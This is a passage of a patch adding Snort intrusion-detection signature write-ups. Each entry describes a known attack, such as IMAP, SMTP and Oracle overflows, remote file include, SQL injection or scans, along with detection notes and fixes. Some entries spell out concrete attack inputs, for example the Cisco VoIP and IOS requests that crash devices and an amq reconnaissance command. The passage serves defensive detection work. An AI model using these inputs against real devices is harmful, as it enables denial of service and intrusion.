+Detailed Information:
+This event is generated when excess data is detected in an IMAP command.
+Some IMAP implementations exhibit programming errors that can lead to a
+buffer overflow condition when excess data is supplied to a static
+buffer.
+
+A vulnerability exists in the way that the Mercury Mail IMAP service
+handles several commands.  An excessively long command argument can
+trigger a denial of service or a buffer overflow and the subsequent
+execution of arbitrary code on a vulnerable server.
+
+--
+Affected Systems:
+	Pegasus Mail Mercury Mail Transport System 3.32
+	Pegasus Mail Mercury Mail Transport System 4.01a
+
+--
+Attack Scenarios:
+An attacker can supplied an overly long command, causing denial of
+service or a buffer overflow.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell<bmc@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1884.txt
@@ -0,0 +1,65 @@
+Rule:
+
+
+--
+Sid: 
+
+1884
+
+-- 
+Summary: 
+This rule has been placed in deleted.rules
+
+-- 
+Impact: 
+
+attacker might have gained an ability to execute commands remotely on the system.
+
+--
+Detailed Information:
+
+This signature triggers when a UNIX "id" command is used to confirm
+the user name of the currently logged in user over any unencrypted
+connection. Such connection can be either a legitimate telnet
+connection or a result of spawning a shell on FTP, POP3, SMTP or other
+port as a consequence of network exploit. The string "uid=" and
+"(web)" is an output of an "id" command indicating that the user
+has "web" account privileges, typically used by the web server
+process.  Seeing such a response indicates that some user connected
+over the network to a target web server and likely exploited the web
+server to launch a shell.
+
+--
+Attack Scenarios: 
+
+a buffer overflow exploit against the WWW server results in "/bin/sh" being executed. An automated script performing an attack, checks for the success of the exploit via an "id" command.
+
+-- 
+Ease of Attack: 
+
+this post-attack behavior can accompany different attacks
+
+-- 
+False Positives: 
+
+the signature will trigger if a legitimate system administrator executes the "id" command over the telnet connection which uses one of the web ports, as defined in snort.conf
+
+--
+False Negatives: 
+
+not known
+
+-- 
+Corrective Action: 
+
+investigate the server for signs of compromise, run
+the integrity checking software, look for other IDS alerts involving
+the same IP addresses.
+
+--
+Contributors: Anton Chuvakin <anton@chuvakin.org>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1814.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+1814
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a flaw on a 
+Cisco VoIP telephone.
+
+--
+Impact:
+Denial of Service.
+
+--
+Detailed Information:
+Certain versions of Cisco's VoIP phones are vulnerable to an attack that
+can cause them to reboot when they recieve an http request such as 
+http://ciscophoneip/StreamingStatistics?<value> where <value> is an 
+integer value of arbitrary high value, typically a number greater than 
+32768.
+
+--
+Affected Systems:
+	Cisco VoIP Phones 7910, 7940, and 7960
+	  (software version 3.0 to 3.2)
+
+--
+Attack Scenarios:
+A remote user can send the exploit url to the phone, causing the phone 
+to reboot and disallowingthe user to place or recieve calls for up to 30
+seconds.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives: 
+None known.
+
+--
+False Negatives: 
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com> 
+Snort documentation contributed by Josh Sakofsky
+
+-- 
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/4794
+
+--
--- /dev/null
+++ b/doc/signatures/100000143.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+100000143
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a
+directory traversal associated with Imail Web Calendaring
+servicel
+
+--
+Impact:
+A successful attack can permit a user to navigate outside
+of the web root directory and read files.
+
+--
+Detailed Information:
+The Imail Web Calendaring Server does not properly sanitize
+a malformed URL that contains directory traversal characters.
+This vulnerability is associated with static objects identified
+by names ending in .jsp, .jpg, .gif, .wav, .css, or .htm.  This
+can permit an unauthorized user to examine files that may contain
+sensitive information.
+
+--
+Affected Systems:
+Ipswitch IMail Server 8.2 and prior
+Ipswitch IMail Server 8.15 and prior
+
+--
+Attack Scenarios:
+An attacker send a URI containing a directory traversal to view
+sensitive files on a vulnerable server.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the most current non-affected version of the product.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References
+Other:
+
+--
--- /dev/null
+++ b/doc/signatures/3453.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+3453
+
+--
+Summary:
+This event is generated when an attempt is made to probe for
+information on a host running Arkeia Client Backup server.
+
+--
+Impact:
+This may be reconnaissance to find version or operating
+system information about the Arkeia Client Backup server
+to later run an appropriate exploit.
+
+--
+Detailed Information:
+By default, Arkeia Client Backup servers do not require any
+authentication for informational requests.  An attacker who
+may be planning to exploit a vulnerable version of the software
+may attempt to request file or system information.
+
+--
+Affected Systems:
+	Arkeia version 5.3 and prior.
+
+--
+Attack Scenarios:
+An attacker can attempt to query an Arkeia Client Backup
+server for system or file information.
+
+--
+Ease of Attack:
+Simple.  Exploits are publicly available.
+
+--
+False Positives:
+None known. If you run Arkeia Client Backup on your network,
+make sure that your the variable $EXTERNAL_NET is configured
+to reflect IP addresses outside of your network.  Otherwise,
+this rule will alert on valid internal traffic.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the most current non-affected version of the product.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References
+
+Metasploit:
+http://metasploit.com/research/arkeia_agent
+
+--
--- /dev/null
+++ b/doc/signatures/1546.txt
@@ -0,0 +1,65 @@
+Rule:
+--
+Sid:
+1546
+--
+Summary:
+This event is generated when an attempt is made to issue a denial of 
+service attack against a Cisco router or switch.
+--
+Impact:
+If successful, the router will hang for two minutes, then reboot.   
+Under certain circumstances, the router will hang until power cycled 
+manually.
+--
+Detailed Information:
+The HTTP server that is part of some versions of the Cisco IOS software 
+has a bug that causes it to enter an infinite loop when handling a 
+request for "/%%".
+--
+Affected Systems:
+The following Cisco products can be affected.   Whether they actually 
+are vulnerable or not depends on the version of IOS that they are 
+running.   To properly determine if your product is vulnerable, see the 
+Cisco website referenced below.
+Cisco routers in the AGS/MGS/CGS/AGS+, IGS, RSM, 800, ubr900, 1000, 
+2500, 2600, 3000, 3600, 3800, 4000, 4500, 4700, AS5200, AS5300, AS5800, 
+6400, 7000, 7200, ubr7200, 7500, and 12000 series.
+Most recent versions of the LS1010 ATM switch.
+The Catalyst 6000 if it is running IOS.
+Some versions of the Catalyst 2900XL and 3500XL LAN switches.
+The Cisco DistributedDirector.
+--
+Attack Scenarios:
+This attack creates a denial of service.
+--
+Ease of Attack:
+Very easy.   
+--
+False Positives:
+Unlikely.
+--
+False Negatives:
+This signature only looks for attacks against systems that are included 
+in the $HTTP_SERVERS group.   Many administrators do not consider 
+routers or switches to be web servers, and therefore may not include 
+vulnerable devices in this group, causing an attack to proceed 
+unnoticed.   If you think one of your routers or switches is vulnerable, 
+reference it in the $HTTP_SERVERS group.
+--
+Corrective Action:
+Turn off the web server functionality, use access lists to ensure only 
+trusted hosts have access to the device, or upgrade your version of IOS.
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Snort documentation contributed by Kevin Peuhkurinen
+
+-- 
+Additional References:
+
+Cisco
+http://www.cisco.com/warp/public/707/ioshttpserver-pub.shtml
+
+--
--- /dev/null
+++ b/doc/signatures/1322.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid: 1322
+
+--
+Summary:
+This event is generated when packets on the network have both the 
+fragment and don't fragment bits set.
+
+--
+Impact:
+Possible reconnaisance.
+
+--
+Detailed Information:
+This rule detects a case where the packet is designated as having more 
+fragments whilst at the same time the "don't fragment" bit is also set.
+
+Under normal circumstances an ICMP error message (type 3 code 5) should 
+be generated and sent back to the source of the packet.
+
+The attacker may be trying to ascertain information about the network 
+architecture and configuration of network devices as a prelude to an 
+attack.
+
+an indicator of unauthorized network use, reconnaisance activity or 
+system compromise. These rules may also generate an event due to 
+improperly configured network devices.
+
+--
+Affected Systems:
+	All
+
+--
+Attack Scenarios:
+The attacker would need to craft packets with the fragment and don't 
+fragment bits set.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Employ a packet filtering firewall to deny outbound ICMP error messages.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1956.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+1956
+
+--
+Summary:
+This event is generated when a request is made to discover the version and configuration information associated with the Remote Procedure Call (RPC) amd.
+
+--
+Impact:
+Information disclosure.  This request can allow an attacker to discover the version of amd running as well as other configuration information about the host.
+
+--
+Detailed Information:
+The amd RPC service implements the automounter daemon on UNIX hosts.  The amd service automatically mounts and unmounts requested file systems.  An attacker can make a request to amd to discover its version number. A successful request will return the version number along with other valuable configuration information about the server, including the architecture.  
+
+--
+Affected Systems:
+Any system running amd.
+
+--
+Attack Scenarios:
+An attacker may request the version number associated with amd.  The response may give an attacker valuable configuration information about the host.
+
+--
+Ease of Attack:
+Simple.  Execute the command 'amq -v -U -h hostname/IP'
+
+-
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/2839.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2839
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure suspend_master_activity
+. This procedure is included in
+sys.dbms_repcat_mas.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/657.txt
@@ -0,0 +1,55 @@
+Rule:
+
+--
+Sid:
+657
+
+--
+Summary:
+This event is generated when an external user sends a HELP command with specific syntax to an internal SMTP server, which may indicate an attempt to exploit a buffer overflow vulnerability in NetManage Chameleon SMTP server. 
+
+--
+Impact:
+Severe. Remote execution of arbitrary code, leading to remote root compromise. 
+
+--
+Detailed Information:
+NetManage Chameleon SMTP server contains a buffer overflow vulnerability in the HELP command. If the HELP command is used with an argument longer than 514 characters, a buffer overflow condition occurs, allowing the execution of arbitrary code.
+
+--
+Affected Systems:
+Systems running NetManage Chameleon Unix 97 or NetManage Chameleon 4.5.
+
+--
+Attack Scenarios:
+An attacker sends an overly long string to a vulnerable NetManage Chameleon SMTP server in the HELP command. This causes a buffer overflow condition, allowing the attacker to execute arbitrary code on the server and obtain root privileges on the mail server.
+
+--
+Ease of Attack:
+Simple.
+
+--
+alse Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest version of NetManage Chameleon SMTP server.
+
+--
+Contributors:
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Sourcefire Technical Publications Team
+Jen Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/100000400.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000400
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Ovidentia" application running on a webserver. Access to the file "fileman.php" using a remote file being passed as the "babInstallPath" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "babInstallPath" parameter in the "fileman.php" script used by the "Ovidentia" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Ovidentia
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1207.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1207
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1057.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1057
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/849.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+849
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2078.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+2078
+
+--
+Summary:
+HTTP.
+
+--
+Impact:
+Data loss and disclosure of information.
+
+--
+Detailed Information:
+A vulnerability exists such that a carefully crafted SQL query can be 
+used by a malicious user that will delete all private messages for users
+on the system.
+
+The scripts do not perform detailed checking of SQL queries in some 
+instances. This leaves the system vulnerable to SQL injection 
+techniques.
+
+--
+Affected Systems:
+	phpBB Group phpBB 2.0.3
+
+--
+Attack Scenarios:
+The attacker can craft his own SQL query to be executed or use a known 
+exploit for this vulnerability.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non vulnerable version of phpBB.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/6634
+
+--
--- /dev/null
+++ b/doc/signatures/111-6.txt
@@ -0,0 +1,58 @@
+Rule: 
+
+--
+Sid: 
+111-6
+
+-- 
+Summary: 
+This event is generated when the pre-processor stream4
+detects network traffic that may constitute an attack.
+
+-- 
+Impact: 
+This may indicate scanning activity.
+
+--
+Detailed Information:
+The pre-processor stream4 has detected network traffic that may indicate
+an Xmas Tree scan is in progress. That is, packets with the FIN, URG and
+PUSH flags set have been detected.
+
+--
+Affected Systems:
+	All systems
+
+--
+Attack Scenarios: 
+An attacker may utilize scanning techniques to determine possible points
+of exploitation against a host.
+
+-- 
+Ease of Attack: 
+Simple. Many scanning tools exist.
+
+-- 
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+Corrective Action:
+Check the target host for signs of compromise.
+
+Ensure the system is up to date with any appropriate vendor supplied patches.
+
+--
+Contributors:
+Martin Roesch <roesch@sourcefire.com>
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000423.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000423
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "DotWidget CMS" application running on a webserver. Access to the file "index.php" using a remote file being passed as the "file_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "file_path" parameter in the "index.php" script used by the "DotWidget CMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using DotWidget CMS
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/379.txt
@@ -0,0 +1,56 @@
+Rule:
+
+--
+Sid:
+379
+
+--
+Summary:
+This event is generated when an ICMP echo request is made from a Windows host running "pinger" software.
+
+--
+Impact:
+Information gathering.  An ICMP echo request can determine if a host is active.
+
+--
+Detailed Information:
+An ICMP echo request is used by the ping command to elicit an ICMP echo reply from a listening live host.  An echo request that originates from a Windows host running "pinger" software contains a unique payload in the message request.
+
+--
+Affected Systems:
+All
+
+--
+Attack Scenarios:
+An attacker may attempt to determine live hosts in a network prior to launching an attack.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+An ICMP echo request may be used to legimately troubleshoot networking problems.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Block inbound ICMP echo requests.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.org>
+Documented by Steven Alexander<alexander.s@mccd.edu>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS165
+
+--
--- /dev/null
+++ b/doc/signatures/3091.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+3091
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft License Logging Service.
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+Microsoft License Logging Service is used to manage licenses for
+Microsoft server products.
+
+A vulnerability in the service exists due to a programming error such
+that an unchecked buffer may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain administrative access to the target host.
+
+The unchecked buffer exists when processing the length of messages sent
+to the logging service.
+
+--
+Affected Systems:
+	Microsoft Windows Server 2003
+	Microsoft Windows Server 2000
+	Microsoft Windows NT Server
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message to the service
+containing code of their choosing to be run on the server.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2182.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+2182
+
+--
+Summary:
+This event is generated when activity generated by the Linux Trojan Typot is detected.
+
+--
+Impact:
+Increased network traffic leading to bandwidth consumption.
+
+--
+Detailed Information:
+Current information based on binary analysis of the Typot Trojan shows that network traffic is generated with a TCP window size of 55808 bytes. Whilst this Trojan does not appear to contain any malicious payload it will generate spurious network scanning activity. The source IP address for the scanning activity is spoofed.
+
+When a host becomes infected a file named "r" is created in the same directory the binary was executed from. The Trojan then begins generating network traffic as described above. An infected victim host may have a file named "a" in the /tmp directory. After an unspecified time period the Trojan itself may attempt to connect to an external IP address using Secure Shell (ssh) for communication. If this communication is succesful, the "a" file may be deleted.
+
+The Trojan may also use the libpcap and libnet libraries to generate network traffic.
+
+--
+Affected Systems:
+Linux
+
+--
+Attack Scenarios:
+An attacker may have installed the Trojan after a previous system compromise.
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+Any application that generates a TCP SYN packet with a window size of 55808 bytes will generate this event. Currently it is not known which, if any, commonly deployed applications generate these specific packets.
+
+It is also possible to recreate this particular traffic using network packet generating tools such as hping.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Investigate the affected host for signs of system compromise.
+
+Delete the files "r" and "a" if found.
+
+--
+Contributors:
+Sourcefire Research Team
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Matt Watchinski <mwatchinski@sourcefire.com>
+
+--
+Additional References:
+
+Symantec
+http://securityresponse.symantec.com/avcenter/venc/data/trojan.linux.typot.html
+
+e-week
+http://www.eweek.com/article2/0,3959,1130759,00.asp
+
+Intrusec
+http://www.intrusec.com/55808.html
+
+--
--- /dev/null
+++ b/doc/signatures/2905.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2905
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure create_snapshot_repschema
+. This procedure is included in
+sys.dbms_repcat_sna.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1164.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1164
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2008.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
